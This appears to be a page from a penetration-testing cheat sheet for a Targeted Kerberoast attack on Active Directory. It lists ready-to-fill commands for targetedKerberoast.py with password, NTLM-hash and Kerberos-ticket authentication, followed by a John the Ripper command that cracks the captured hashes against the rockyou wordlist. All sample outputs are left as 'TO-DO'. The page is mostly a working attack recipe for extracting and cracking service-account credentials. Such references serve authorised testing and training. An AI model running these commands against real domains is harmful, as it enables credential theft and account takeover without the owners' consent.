Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Targeted Kerberoast
1. Targeted Kerberoast
# Password
python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --dc-ip '<DC_IP>'
Sample Output:
TO-DO# NTLM
python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -H :<HASH> --dc-ip '<DC_IP>'
Sample Output:
TO-DO# Password-based Kerberos
python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --dc-host '<DC>'
Sample Output:
TO-DO# NTLM-based Kerberos
python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -H :<HASH> -k --dc-host '<DC>'
Sample Output:
TO-DO# Ticket-based Kerberos
python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -k --no-pass --dc-host '<DC>'
Sample Output:
TO-DO2. Hash Crack
john --wordlist=/usr/share/wordlists/rockyou.txt <HASH_FILE>
Sample Output:
TO-DORef: targetedKerberoast